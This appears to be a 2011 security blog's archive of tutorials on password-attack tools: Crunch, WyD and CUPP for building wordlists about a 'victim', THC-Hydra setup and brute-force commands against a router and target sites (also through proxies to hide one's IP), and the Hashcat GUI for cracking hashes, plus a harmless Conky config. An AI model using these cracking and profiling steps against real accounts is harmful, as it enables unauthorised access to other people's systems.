I made this video while I was messing around trying to figure out how to get started with the whole making videos thing. PACK stands for Password Analysis and Cracking Kit, and it can be a handy tool to have around. It can be used to analyze your wordlists and provide you with helpful statistics which can show trends. These trends can be used to help you identify the quickest methods for yeilding the highest results. It also has the ability to provide an analysis output of the proposed masks to use or that would be needed, which can be very handy in turning around and inputting into tools in the Hashcat suite. It does not do much else, hope you enjoy none the less...

Wordlists & Password Profiling with CRUNCH, WyD, & CUPP

2011-06-19T01:33:00.001-05:00

Today I am going to show you how to use three (3) different tools in Linux (Backtrack 5) for creating targeted wordlists to help speed up and increase the chance of success for your dictionary attacks. I will be covering the use of CRUNCH for pure wordlist generation, and then I will cover the use of WyD and CUPP which use password profiling techniques to create targeted wordlists to narrow your attacks. I will provide the written walk through here with a video at the end. Let's begin with CRUNCH...

=====================================================================================

++++++++++++++++++++++++++++CRUNCH - WORDLIST GENERATOR+++++++++++++++++++++++++++++

=====================================================================================

CRUNCH is a wordlist generator based on the user specified character set. It takes the character set designated by the user and generates all combinations and permutations possible into a nice new wordlist for you to use in your dictionary/bruteforce tools. It supports lower and upper alpha-numeric as well as special character set and also has the ability to break the output into multiple files based on the number of lines or designated file size. It also has the ability to pause and resume which is helpful when generating very large wordlists that may take some time to fully compile. You can download the latest version from the sourceforge homepage, which is located here: http://sourceforge.net/projects/crunch-wordlist/files/

You will need to download and extract using the following methods:

COMMAND: tar -zxvf crunch-3.0.1.tgz

COMMAND: cd crunch-3.0.1/

COMMAND: make && make install

Crunch can be used to create great wordlists and with the proper sytnax can even be piped directly into brute-forcing tools, for example AirCrack and CowPatty can use the piped output for Wireless password cracking (I highly suggest CowPatty if you are dealing with large wordlists due to restrictions in AirCrack on the number of keys that can be processed).

Basic syntax of CRUNCH looks like this (See MAN Pages for details):

./ crunch <min-len> <max-len> [-f /path/to/charset.lst charset-name] [-o wordlist.txt]

[-t [FIXED]@@@@] [-s startblock] [-c number]

Breakdown of Syntax:

o min-len = minimum length string to start at (REQUIRED)

o max-len = maximum length string to end at. (REQUIRED)

o charset = defines the char set to use (If you leave it will use lower case alpha only.

§ NOTE: If you want to include the space character in your character set you must enclose your character set in quotes, like so: "abc ". If you want to use char set files you can reference the -t argument below or just paste it in (check my Hashcat tutorial for full char sets you can use, or reference the charsets.lst that install s with Crunch in default directory).

o -b = number[type: kb/mb/gb] - which specifies the size of the output file (no space between the number and type (50kb/50mb/50gb).

§ NOTE: only works if -o START is used and the output files will be in the format of starting letter-ending letter for example: ./crunch 4 5 -b 20mib -o START will generate 4 files: aaaa-gvfed.txt, gvfee-ombqy.txt, ombqz-wcydt.txt, wcydu-zzzzz.txt

o -c <number> = Is similar to -b above but breaks the files based on the number of lines to write to the output file. It also requires -o START to be used

§ NOTE: The output files will be in the format of starting letter-ending letter for example: ./crunch 1 1 -f /pentest/password/crunch/charset.lst mixal- pha-numeric-all-space -o START -c 60 will result in 2 files: a-7.txt and 8-\ .txt The reason for the slash in the second filename is the ending character is space and ls has to escape it to print it (so Yes you will need to put in the \ when specifying the filename because the last character is a space)

o -f </path/to/charset.lst> <charset-name> = Allows you to specify a character set from the charset.lst

o -i = Inverts the output so instead of aab,aac,aad you get baa,caa,daa

o -o <wordlist.txt> = defines the file to write output to

o -p <charset> OR -p <word1 word2...> = This tells the tool to not generate words that have repeating characters and produces a much smaller wordlist, generally only helpful if you know the password policy doesn't allow this

o -q <filename.txt> = tells the tool to read from filename.txt and perform permutations based on what is read from file. This can not be used with the -s or -t arguments below

§ NOTE: it also ignores the min and max length arguments despite the fact that they must still be included as part of the sytax to run properly

o -r = this tells the tool to resume where it left off, although you have to make you re=start it with the exact same command that was last used with the addition of the -r at the end (does not work with -s in original command so just remove it when resuming)

o -s <startblock> = this defines the string to start running crunch on

o -t <@*%^> = this is helpful for someone who may have been shoulder surfing and knows some of the characters but not all, as this argument allows you to specify a pattern and define positions to replace (and how to replace), for example:

o -t *^ssw@rd%

§ __ssw_rd_ = the fixed letters

§ @ will insert lower aplha (a-z)

§ * will insert upper alpha (A-Z)

§ % will insert numbers (0-9)

§ ^ will insert symbols (!@#$%^&*)

· Eventually this would work the word P@ssword1 into our final output which would help us find the password needed for this example

o -z <gzip|bzip2|lzma> = This will tell crunch to compresses the output from the -o option using the chosen method (gzip/bzip2/lzma).

EXAMPLE: ./crunch 4 4 abc123 -b 1mb -o START

Generates all possibilities of 4 characters in length (min is set to 4 and max as well)

using the charset of abc123, with defined output file size of not to exceed 1mb

EXAMPLE: ./crunch 1 4 abc123 -b 1mb -o START

Generates all possibilities from 1 to 4 characters in length (min is set to 1 and max

is set to 4) using the charset of abc123, output files not to exceed 1mb

NOTE: You can use a quick "cat filename.txt" to check what words are created and inserted into the file, or "wc -l <filename.txt>" to list the word count. If you look at the above shots you can see how you can split the file output based on size, which is impacted by the length designated and char set used. You should be able to figure it out from here.

======================================================================

+++++++++++++(TUT) Who's Your Daddy Password Profiler (WYD)++++++++++++++++

======================================================================

OK, so that covers CRUNCH and how we use it to create a raw wordlist with every possibility, but this may take a while to attack with...so how can we increase our chances for dictionary attack? We can use the Who's Your Daddy password profiling tool, a.k.a. WyD, to aid us in creating a much narrower wordlist more targeted at the individuals or members of our target site. It and the next tool CUPP are brought to us by the great folks over at Social Engineer [dot] Org. The Who's Your Daddy Password Profiler is a great tool to have in your arsenal, as it can be used to scrape information from web content and the files found on websites to extract usable information that can be used in creating more effective wordlists for dictionary attacks. You can download it from the SE site, found here: http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Who%27s_Your_Daddy_Password_Profiler_(WYD)

The supported file types that it is capable of scraping info from include: plain, html, php (partially, as html), doc, pdf, mp3, ppt, jpeg, odt/ods/odp, and anything unknown with MIME type text/plain will be processed with strings

As usual you will need download and extract the files in order to get starte, like so:

COMMAND: tar -xvf wyd-0.2.tar.tar

COMMAND: cd wyd-0.2/

To start WyD and see the options that we have available, simply type this:

COMMAND: perl wyd.pl

You may be asking: OK but how do I actually use this thing? Don't you worry; I will show you...We will need to use a common Linux tool called WGET to retrieve our entire victim's website. This tool is typically available by default in almost all Linux distros, so you should not have any problems. You can research this on the side as it has tons of options I can't go into here. For now just follow these steps to make a new folder and then move into it so we can recursively download the web content from our target site, like this:

COMMAND: mkdir /victim-site

COMMAND: cd victim-site/

COMMAND: wget -r http://www.victim-site.com

WGET will take a while to get everything but once it is done you can find the results in the victim-site/ folder you ran the WGET command from. Now in order to create a custom wordlist using WyD you will need to use the following command:

EXAMPLE: perl wyd.pl -o /path/to/ouput/file -t -b -e file/OR/path/to/victim-site/

COMMAND: wyd.pl -o victim-wordlist.txt -t -b -e /home/SkyWalker/victim-site/

Breakdown of the above, which I commonly use when running this:

o -o /path/to/output/file = tells it to send everything to file instead of printing to the screen via STDOUT. This file will become our potential wordlist (or wordlists if the -t argument is also used).

o -t = this will tell it to create separate files based on each file type find that the tool uses to extract data from for profiling. This can only be used with the "-o" option referenced above, and will create as many output files as types found/used.

§ NOTE/EXAMPLE: file is 'victim.txt' and there are words found in PDF, plain-text, JPEG and HTML files, you will find the following output files if used: 'victim.txt.pdf', 'victim.txt.jpeg', 'victim.txt.plain' and 'victim.txt.html'.

§ -b = this will tell the tool to disable the removal of non-alpha characters from the start of a word, which can be helpful sometimes as the default behavior of WyD is to remove them.

o -e = this will tell the tool to disable the removal of non-alpha characters from the end of a word, which can be helpful sometimes as the default behavior of WyD is to remove them.

o <filename> OR /path/to/directory/ = this defines where WyD will work its magic

ERRORS: If you experience any errors due to missing perl modules:

· Ignore them and WyD will still run, but it will run without any modules that had errors. Not the end of the world but not the best we can do either.

· Install the missing perl modules that are referenced in the error notes. In order to do this take note of the modules (and associated websites) that are referenced in the errors.

§ If you want to search via the web here is a great place to check details on any perl packages, and links to other helpful info: http://search.cpan.org/

That sums up Wyd, so now I will show you how we can make use of our findings from WyD with the help of CUPP to take things a step further and increase our chances even further for our dictionary attack.

======================================================================

++++++++++CUPP - Common User Passwords Profiler TUTORIAL+++++++++++++++++

======================================================================

CUPP stands for Common User Passwords Profiler, and is a great tool to add to any security testers collection and pairs strongly with the WyD tool covered above. It is a Python tool than can be used for password profiling to strengthen your dictionary attacks by creating targeted dictionaries, or wordlists, to use in attacks.

A weak password might be very short or only use alphanumeric characters, making decryption simple as you will find it in almost any of the common wordlists you can find with a quick Google Search. Another type of weak password that can be easily cracked is one that can be easily guessed. Typical passwords that people commonly use might consist of things like pets names, family, girlfriends/boyfriends, birthdays, and other important date/events, or common things people obsess about like God, sex, love, and money. You will find a lot of these items in common passwords but building a smaller wordlist to work with can sometimes save you a lot of time. CUPP will help to generate a wordlist for you based on what Social Engineering [dot] Org calls "predicting specific target passwords by exploiting human vulnerabilities". You will need to download the file from here: http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Common_User_Passwords_Profiler_(CUPP)

You can extract it using the usual commands:

COMMAND: tar -xvf cupp2.tar.tar

COMMAND: python cupp.py –h

Now you will have two ways to use this tool. You can either use the interactive menu or you can parse results from WyD (which was covered above). I will start with the overview of how to use it for parsing WyD results and then I will cover interactive mode.

OK, assuming you have already used the WyD tool discussed above then you can also use CUPP to parse the results and work its magic. In order to do this you will need to use the following syntax at the console:

COMMAND: python cupp.py -w /path/to/file/<filename-from-WyD-output>

To check how many words were created:

COMMAND: wc -l output-wordlist.txt

In order to bring up interactive mode you will simply start the CUPP tool and use the "-i" argument to prompt for interactive mode ("python cupp.py -i"). The tool will ask you a series of questions about your victim, and then use that information to help create a targeted wordlist you can use. When it is done asking you the basic questions you will also have a chance to choose any "extras", like having it also add special characters to the end of the words it creates. It can also add numbers to the end as well as performing an l337 permutation. Once it is done it will create a text file in the CUPP folder labeled by your answer to the first interactive question.

This wraps up my tutorial/overview of few helpful password profiling tools which will certainly aid in creating custom wordlists to facilitate faster dictionary attacks and with higher success rates. I have also included a video of everything below for those of you who enjoy visual learning. I hope you have enjoyed things this week and please stay tuned for more to come in the future, and remember to ensure you have a strong password for all your safe keepings. If you have any questions or suggestions on anything covered today please leave a comment and let me know or shoot me an email or PM. Until next time...

Thanks,

H.R.

PS – I originally did the write up for installing and running things on Cygwin, but then I shot the video using it on Linux. It works either way, although there are less problems and full functionality of all tools in Linux. Here is the VIDEO for those that are interested:

How to Install CONKY on Backtrack 5

2011-06-19T01:29:00.000-05:00

Today's I will show you how to install Conky on Backtrack 5 (with my first video release) and will share my configuration file so you can get started easily. This is a very cool tool that allows you to hook into Linux API and create your own custom system monitor - that looks super cool too! I will start from the beginning and walk you through basic steps and will use my preconfigured conf file to show what the final product can look like. I will leave it to you to investigate further and tweak it to fit your needs, it is fully customizable so you will have fun. If it gets to messy just remove the configuration file and start over.

Here is the video:

Steps to follow at home:
     apt-get install conky

NOTE: You may need "sudo" in front if you are not on Backtrack

Now you will need to go into "/etc/conky/conky.conf" to make the necessary edits to define what we want to monitor and how we want it all to look. Here are the steps:
     cd /etc/conky
     gedit conky.conf

Customize as you would like, but here is what mine looks like after lots of time on Google and reading through the conky docs. You should be fine with this setup and if you are at all familiar with linux you should be able to edit the conky.conf details (default or below) to your liking by simply changing interface names or colors, etc...Hope you have enjoyed, and stay tuned for more video series to come in the near future.

Laters, H.R

PS - Here is what the content of my conky.conf file looks like (just copy and paste the below over existing content and save):
##################################################################
# Conky, a system monitor, based on torsmo
#
# Any original torsmo code is licensed under the BSD license
#
# All code written since the fork of torsmo is licensed under the GPL
#
# Please see COPYING for details
#
# Copyright (c) 2004, Hannu Saransaari and Lauri Hakkarainen
# Copyright (c) 2005-2010 Brenden Matthews, Philip Kovacs, et. al. (see AUTHORS)
# All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
alignment bottom_left
background no
border_width 1
cpu_avg_samples 2
default_color red
default_outline_color red
default_shade_color red
draw_borders no
draw_graph_borders yes
draw_outline no
draw_shades no
use_xft yes
xftfont DejaVu Sans Mono:size=12
gap_x 5
gap_y 60
minimum_size 5 5
net_avg_samples 2
no_buffers yes
out_to_console no
out_to_stderr no
extra_newline no
own_window yes
own_window_class Conky
own_window_type desktop
stippled_borders 0
update_interval 1.0
uppercase no
use_spacer none
show_graph_scale no
show_graph_range no
wireless_essid wlan0
wireless_mode wlan0
wireless_bitrate wlan0
wireless_ap wlan0
wireless_link_qual wlan0
wireless_link_qual_max wlan0
wireless_link_qual_perc wlan0
wireless_essid mon0
wireless_mode mon0
wireless_bitrate mon0
wireless_ap mon0
wireless_link_qual mon0
wireless_link_qual_max mon0
wireless_link_qual_perc mon0
TEXT
${scroll 16 $nodename - $sysname $kernel on $machine | }
$hr
${color grey}Uptime:$color $uptime
${color grey}Frequency (in MHz):$color $freq
${color grey}Frequency (in GHz):$color $freq_g
${color grey}RAM Usage:$color $mem/$memmax - $memperc% ${membar 4}
${color grey}Swap Usage:$color $swap/$swapmax - $swapperc% ${swapbar 4}
${color grey}CPU Usage:$color $cpu% ${cpubar 4}
${color grey}Processes:$color $processes ${color grey}Running:$color $running_processes
$hr
${color grey}File systems:
/ $color${fs_used /}/${fs_size /} ${fs_bar 6 /}
${color grey}Networking:
Up:$color ${upspeed eth0} ${color grey} - Down:$color ${downspeed eth0}
$hr
${color grey}Name              PID   CPU%   MEM%
${color lightgrey} ${top name 1} ${top pid 1} ${top cpu 1} ${top mem 1}
${color lightgrey} ${top name 2} ${top pid 2} ${top cpu 2} ${top mem 2}
${color lightgrey} ${top name 3} ${top pid 3} ${top cpu 3} ${top mem 3}
${color lightgrey} ${top name 4} ${top pid 4} ${top cpu 4} ${top mem 4}
${color grey}$hr
SYSTEM ${hr 2}
${color grey}Nodename:$color $nodename
${color grey}Current Time:$color $time
${color grey}Uptime:$color: $uptime_short
${color grey}Kernal Version:$color $kernel
${color grey}$hr
CPU ${hr 2}
${color grey}CPU:$color $freq_g Ghz
${color grey}CPU temp:$color $acpitemp C
${color grey}CPU use:$color $cpu % $alignc${cpubar 8}
${color grey}Processes:$color $running_processes/$processes
${color grey}$hr
MEMORY ${hr 2}
${color grey}Memorey usage: $mem/$memmax
$color $memperc % $alignc${membar 8}
${color grey}$hr
WIRELESS ${hr 2}
${color grey}IP:$color ${addr wlan0}
${color grey}Signal:$color ${wireless_link_qual_perc wlan0}
${color grey}Down:$color ${downspeed wlan0} Kb/s ${alignr}Up: ${upspeed wlan0} Kb/s
${downspeedgraph wlan0 15,50 ffffff ffffff} ${alignr}${upspeedgraph wlan0 15,50 ffffff ffffff}$color
Total: ${totaldown wlan0} ${alignr}Total: ${totalup wlan0}
${color grey}$hr
MON0 ${hr 2}
${color grey}IP:$color ${addr mon0}
${color grey}Signal:$color ${wireless_link_qual_perc mon0}
${color grey}Down:$color ${downspeed mon0} Kb/s ${alignr}Up: ${upspeed mon0} Kb/s
${downspeedgraph mon0 15,50 ffffff ffffff} ${alignr}${upspeedgraph mon0 15,50 ffffff ffffff}$color
Total: ${totaldown mon0} ${alignr}Total: ${totalup mon0}

How to Setup WORKING THCHydra and Cygwin Environment on Windows 7

2011-06-09T13:57:00.002-05:00

UPDATED: Now includes video for getting XHYDRA working on Backtrack 5 at the bottom!

Today I will show you how to setup the parallel threaded multi-protocol cracker known as THCHydra to work under a Windows 7 environment. In order to pull this off properly we will need to setup a Cygwin environment on our Windows machine, as there is NO supported .EXE file for Windows to make this magically work (probably a virus if you find one or it is very outdated). Cygwin is like a Linux emulator for Windows, in that it creates a Linux API environment within your windows environment to provide a lot of Linux API functionality (not 100% but close). This is done through the cywin1.dll which allows you to run many programs not originally designed for Windows (i.e. Linux programs like THChydra). The catch is that you can't just run any Linux program you want; you have to build or compile everything you will want to use from source to get it to work in Cygwin environment properly (and even then it is not guaranteed it will work if it was never designed for Windows/Cygwin). OK with that out of the way, we can begin...

What you need:

· Latest version of Cygwin, available here: http://cygwin.com/setup.exe

· Latest source for THCHydra (currently v6.3), available here: http://www.thc.org/download.php?t=r&f=hydra-6.3-src.tar.gz

o NOTE: If you are using Linux or already have Cygwin installed and just want intro to THCHydra and how to compile properly just skip the Cygwin steps and move straight to the bottom where we focus on THChydra.

+=============================================+

| Steps to Install Cygwin and create environment: |

+=============================================+

You need to start by downloading the Setup.EXE file from the main site listed above. Just double click on this when you are ready to get started. This will open the initial setup for Cygwin environment, which by default only includes the basic items needed. You can search through them and choose the ones you want/need or choose simply to include everything if you have the space and want to avoid having to troubleshoot missing items later. For example, if for example you wanted to also compile C++ programs you would need to make sure you included the gcc-g++ package and some kind of text editor like Vi or Nano. When running setup.exe, clicking on categories and packages in the package installation screen will provide you with the ability to control what is installed or updated. Another option is to install everything by clicking on the Default field next to the All category. If you have low bandwidth this could take some time as it downloads most of the packages from Internet (like SVN), so go have lunch and a beer, smoke or whatever your fancy and come back in a bit. This is what the process should look like for you upon opening the first time through completion with Desktop shortcut created:

**NOTE**: You can choose to only install the basics and add what you want in later, but to keep things easy and avoid having to trouble shoot to many issues I suggest just pick "ALL". Today's HDDs are getting larger and cheaper so I doubt many will have any issues due to space if you select ALL (mine was 8.29Gb total disk space once completely installed with all packages). If you want to go more advanced and select only what you need feel free, be aware that to use the GUI for THChydra, known as XHYDRA, you will need to ensure you also chose to install the proper Cygwin/X requirements as well as the basics since it relies on x-Server and Cygwin/X consists of X server, X libraries, and nearly all of the standard X clients.

When you are done Setup.EXE saves everything and creates a shortcut on your desktop as well as in the start menu. You can then use the Setup.EXE file any time you want to update or install a new Cygwin package, as once you have gone through the initial install choices it will remember your final configuration options so anytime you run it again it will open and allow you to choose to update your system by selecting additional packages.

Installed and working console should look like this; just double click your shortcut on desktop:

Now you can test it out by issuing a few commands that you wouldn’t normally have use to in Windows that are common Linux commands. Here is a quick view of: "pwd", "cd /", "ls", "ps":

**NOTE: If you are trying to find your main Windows OS drive you need to navigate to it through the "cygwindrive" located in the root folder of Cygwin environment. Here is a quick example:

EXAMPLE: cd /cygdrive/<drive letter>/Users/<username>/path/location

For me I use the following to get to my main OS desktop area:

COMMAND: cd /cygdrive/c/Users/SkyWalker/Desktop

Now to copy the downloaded hydra tar file from our main OS desktop to our Cygwin desktop use this:

Example: cp hydra-6.3-src.tar.gz /home/<cygwin-username>

Mine: cp hydra-6.3-src.tar.gz /home/SkyWalker

Then: cd /home/SkyWalker

Then: ls (to confirm it was copied to where we wanted it)

This ends our brief overview and review for installing Cygwin, please spend time on the homesite and reading the user guide to figure out all the ins and outs of it. If for some reason you decide you want to remove one of the installed Cygwin packages you will simply need to re-run the Setup.EXE file. Once it is open you simply navigate the list of packages that are already installed, and choose the category you want to edit (or click on the View button). Click on the options until it changes to Uninstall and then choose next to finalize the removal of the desired package (just click till you get there, it goes: Default>Install>ReInstall>UnInstall).

If you want to remove it entirely from your system simply stop all services from running and delete all files, folders and subdirectories as well as any Desktop shortcuts from your machine and from the Setup.EXE install folder and it will be gone.

+=====================================================+

| Steps to Compile THCHydra, once Cygwin is operational |

+=====================================================+

I have showed you above how you can move the THCHydra tar file from where ever you downloaded it so we can start working with it. Now navigate their using your Cygwin terminal, and we will begin by extracting the contents of the download using the following command:

COMMAND: tar -zxvf hydra-6.3-src.tar.gz

NOTE: you can add "-C /desired/path/location" to the end of the command to extract it to another location other than where you currently are located

OK, now that it is extracted you will have a new folder called hydra-6.3-src and inside you will find the contents of what was extracted, but we still need to compile it in order to get it working (you can delete the original tar file when we are done extracting). In order to compile the program you will need to use the following commands from the terminal:

COMMAND: cd /hydra-6.3-src

COMMAND: ./configure

COMMAND: make

COMMAND: make install (THIS IS ERROR PRONE ON CYGWIN)

NOTE: The last one for make install is not required but allows it to install to the local path environment to avoid always having to navigate to the install folder to use/run. This is mainly for my Linux users as it doesn’t properly work in Cygwin environment due to the default paths being different and errors can be ignored. You can edit this if needed to try and get it working, or simply navigate to the hydra folder before running it each time. If you want to add SSH you need to setup libssh on your machine as well (available at: http://www.libssh.org), and you will also need to add the "-DWITH_SSH1=On" argument to the first make command (i.e. ./configure>make -DWITH_SSH1=On>make install). The default make will also setup the necessary requirements for Xhydra if you have all of the dependencies needed, however I should mention that it is not functional in Cygwin environment due to issues with the GTK+ front end and Cygwin X Server. I previous had XHYDRA working but now seems to fail due to multiple errors but I am not a real programmer and don’t quite have the time to troubleshoot it. If you know anyone that is good with GTK programs then you might be able to fix the errors when it runs under Cygwin/X (just start X Server and then X-terminal and then run ./xhydra at command line in X-terminal to start the GUI. It will appear to be fine until you hit start to run it), until then XHYDRA only works in a 100% real Linux environment.

Now let us confirm we did not waste our time for nothing, check successful installation by issuing the following command to bring up the help menu and see all of the available options:

COMMAND: ./hydra -h

I will not go into great detail as the user guide is chalked full of details and there are already a lot of other tutorials on the net the cover how to use it, but not a lot on how to get it working on Windows (which is why I wrote this article). In order to get you started I will show you a quick example of cracking password on a basic home router user/pass for my network with Hydra (I am using a spare Netgear home router for this test), it goes a little something like this...

COMMAND: hydra -l admin -P /path/to/wordlist/passwords.txt -e ns -t 15 -f -s -vV 192.168.1.1 http-get -m /

Here is how it breaks down:

· the "-l" defins the username to use for all attempts

· the "-P" defines password to use or the path to use for wordlist to read passwords while attacking

· the "-e ns" instructs Hydra to attempt check for valid NULL connection (meaning blank or no password used)

· the "-t x" defines the thread count to be used, or how many tasks at once (where x = a number)

· the "-f" instructs Hydra to exit upon finding the first set of valid credentials or user/pass combo

· the "-s" instruct Hydra to use SSL for connection

· the "-vV" simply puts Hydra into verbose mode so you see what is going on while it is running

· "192.168.1.1" is being used as the IP address we are targeting (simply change to fit your need)

· the "http-get" defines the method or protocol to use for attacking (see below for full list of protocols)

· the "-m /" is defining where to target the attacks at, or the page to try and crack

You can see above it found the password (P@ssword1) for the username admin. You can search the user guide or Google if you need further explanations on how to use it or how to target other protocols, but that should atleast give you enough to get started. I must also note some important pieces of information that you should be aware of when cracking over the network with Hydra. First, if the password is not in your dictionary you will never find it (Period - the end!). Secondly, there are going to be some basic limitations that will impact your time, for example the maximum number of attempts possible per connection, protocol being attacked/used, bandwidth, size of word list and CPU power. These factors can all impact overall time it takes to exhasut all possibilities. The "-t" argument referenced aboved can be used to change the parallel thread count being used to help speed things up, but dont set it too high or will have the reverse affect. Here are some common max limits for attempts per connection, from the tools creators: telnet=4, ftp=6, pop3=1, amd imap=3, and here is the list of all supported protocols (as of the writing of this tutorial) so have fun cracking as the possibilities are limited only by your imagination:

AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET,

HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET,

HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP,

NNTP, PCNFS, POP3, POSTGRES, REXEC, SAP/R3, SMB,SMBNT, SMTP, SNMP, SOCKS5,

SSH(v1 and v2), Subversion, Teamspeak (TS2), TELNET, VMware-Auth, VNC and XMPP.

PRO TIP #1:

A key tip to helping stay secure is to always use a VPN connection when testing to help hide your IP, but Proxies are also a great thing to use. If you need a list of up to date working proxies please see my page dedicated to this here: http://kaoticcreations.blogspot.com/p/free-proxy-list-anonymous-and-elite.html. Once you have identified the proxy you will be using you can incorporate it into THCHydra when testing.

If you are using the http/www service for cracking then you need to use the following argument in your command you are using:

COMMAND: ./hydra -m /dir/ -l dumbuser -P /path/to/your/passlist www.tagetsite.com http -HYDRA_PROXY_HTTP="http://10.10.10.10:8080/"

If you are using any other service for cracking then you will need to use this format instead (very similar but notice the end of the argument changes from HTTP to CONNECT):

COMMAND: ./hydra -m LH -l dumbuseradmin -P sam.dump www.tagetsite.com smbnt -HYDRA_PROXY_CONNECT="10.10.10.10:8080"

If you need to enter credentials to use your proxy then you would add this to the end of either option:

COMMAND: HYDRA_PROXY_AUTH="user:pass"

COMMAND: ./hydra -m LH -l dumbuseradmin -P sam.dump www.tagetsite.com smbnt -HYDRA_PROXY_CONNECT="10.10.10.10:8080" -HYDRA_PROXY_AUTH="user:pass"

PRO TIP#2:

A strong word list is also very helpful when it comes to cracking, so try to keep manageable word lists or use tools to help create narrowed down word lists for better, or more targeted, results. THCHydra comes with the PW-INSPECTOR tool which can be used to trim a wordlist down based on password policy or known details. I like to use the word list tools provided by the Hashcat team as well as a tool called Shmoosh2x64.exe. The Hashcat team has a set of tools to help with expanding, sorting, and splitting wordlists and the shmoosh tool helps to combine multiple wordlists while also sorting out duplicates so you get a new wordlist that is full of unique words. I suggest playing with them all as they can all come in handy in various occasions, and all have been documented on their respective sites if you need help with the proper command syntax to use (Google is your friend). If you need to find a good wordlist just search around Google as there are many out there, and I also highly suggest tools like CeWL, CUPP (Common User Passwords Profiler), or WyD (Who's Your Daddy Password Profiler) which can be used to spider sites to help create wordlists based on unique words found on the site that you can then turn around and use to performing bruteforce attacks with (as mentioned above start focused if you can and then broaden your search/attempts to increase your effectiveness).

Hopefully this tutorial has showed you how you can get the latest version of THCHydra working under a Windows 7 environment. This should be another great tool to add to your collection and along with my previous post on the Hashcat tools you should be covered now for all of you password cracking needs, both local and remote. I may cover some word list techniques down the road to complete the series and create a triple threat. I also hope this tutorial helps to ignite some creativity in others to think outside the box for what tools are available to them and how they can be used.

Enjoy, and until next time...

H.R.

UPDATE - Here is a VIDEO of showing how to get XHYDRA working under Backtrack 5:

Cracking Password Hashes with CPU & GPU Power

2011-06-04T14:58:00.001-05:00

UPDATE: New video at bottom...

Today I am going to tell you about a kick ass tool for cracking hashes on Windows platform that is capable of leveraging the power of your CPU or even better the power of your GPU(s)...or BOTH. I am even going to use a few pictures for a first, hope you like it. The genius developers behind Hashcat and oclHashcat just released a new version which puts everything in a nice streamlined GUI that is very simple to use and works with both NVidia (CUDA) and ATI (OpenCL) cards, or just plain old CPU power. If you're a console junkie they still have those versions available independently for download as well. You can find them all here: http://hashcat.net/files/. You can choose the one you want from the options on the left, but today I am going to be covering the wonderful new GUI that was just released (hashcat-gui_v0.4.2). I highly suggest you wonder the Hashcat site after you read through this as it is full of knowledge and well written overviews and examples. For now, I will cover some basics...

The entire suite of tools together with CPU and GPU is very powerful which helps to exponentially speed up the time to recovery and are capable of cracking the following types of hashes:

· MD5 (and MANY variations)

· SHA1 (and variations)

· MySQL

· SSHA-1

· MD4

· NTLM

· Domain Cached Credentials (DCC)

· MSSQL

· SHA256

· SHA-512

· Oracle 11G

· DES(Unix)

A few other highlights worth mentioning are that it does not require any installation (can run from USB) and it is FREE and also works on both 32 and 64 bit operating systems. The tool set is also capable of working under Linux and the console versions come pre-loaded with Backtrack 4 and 5 but I am excited and focused on the latest GUI release so I won’t be covering those as I am tired of typing out the commands (hence my excitement). The latest GUI wraps all of the previous console releases under one roof (hashcat, oclHashcat, oclHashcat-plus, and oclHashcat-lite). Now for some overview and review...

You will need to download the software from the link I gave you above and unzip the folder to wherever you would like to run it from. If you are using the GUI version then it doesn’t matter, if you are using the console version you need to navigate to that folder for it to work unless you modify your environment paths. You can just double click on the hashcat-gui64.exe or hashcat-gui32.exe, depending on your setup and it will launch the GUI. You should see this first (choose the one that fits your system);

Choose CUDA for NVidia cards and OpenCL for ATI cards or CPU if you don’t have any GPU to use. NOTE: If you select one of the GPU options it will load the CPU requirements as well so you only need to choose one option. Then it will load the GUI with all of the needed tools, and will then look like this:

Hashcat (Tab1):

Let’s begin with an overview of Hashcat first and then I will take you through the other tabs. Hashcat is the part of the tool that leverages the CPU power to crack hashes, while the rest of the tools/tabs we will cover rely on the GPU(s). You will need to place your hashes in a file so you can load it in the tool, just click on open and browse to find and load. Next you can choose to check to remove the cracked hashes or not. I like to move copies into the local Hashcat folder to work on so I have backups elsewhere and find it nice to size it down as I go through all of my variations to get an idea of what is working and what isn’t (helps if you are working on large lists). You can also change the HASH:PASS separator if you do not like the default ":", but this is not typically needed. Also I have a nice trick I will share later that works if you keep the default. Next comes the wordlists, you can add as many as you have and then arrange the order of them as well. Simply click on the "Add files" button and browse to where you keep your Dictionary files. I have used shmoosh2x64.exe to combine all of my wordlists into a single file, I suggest you find a tool that works for you to keep the number to a reasonable level or by category so you can load in the ones you want or arrange as needed after loading them all in. Next you will need to identify the mode and the hash type to use. You can change the mode to alter your word list based on the description, by bruteforce mode, or you can go a step further and use rules to alter your word lists performing a hybrid attack.

I will assume you can figure out the Hash Type drop down menu but some may have trouble with the modes so here is a quick overview of the different attack modes:

· straight - This mode will go through your dictionary from top to bottom without altering anything, if it is on your list it will find it if not it won’t...

· combination - This mode will combine words together in the form of word1word1, word1word2 using the defined dictionary to pair the word combinations.

· Toggle-Case - This mode will go through your defined wordlist and will alternate the Case used on each of the words, for example: word, Word, wOrd, woRd, worD, and so on...

· Permutation - This mode will try to extend your wordlist by attempting to try all possible combinations of words that might be created from the characters used in each word. This can be accomplished through a good rule set so I won’t cover too much of it...

· Table-Lookup - This mode allows you to compare Hashes against pre-computed hash tables. If you have these on hand or if you have created them yourself this may be helpful to you. I tend not to use rainbow tables so I will not go into this here...

· Bruteforce - This will try to use bruteforce to find the password by simply trying every possible combination available given the charset to use and the min and max length to try, the time needed to run through all depends on the charset used and the strength of the setup you run it on.

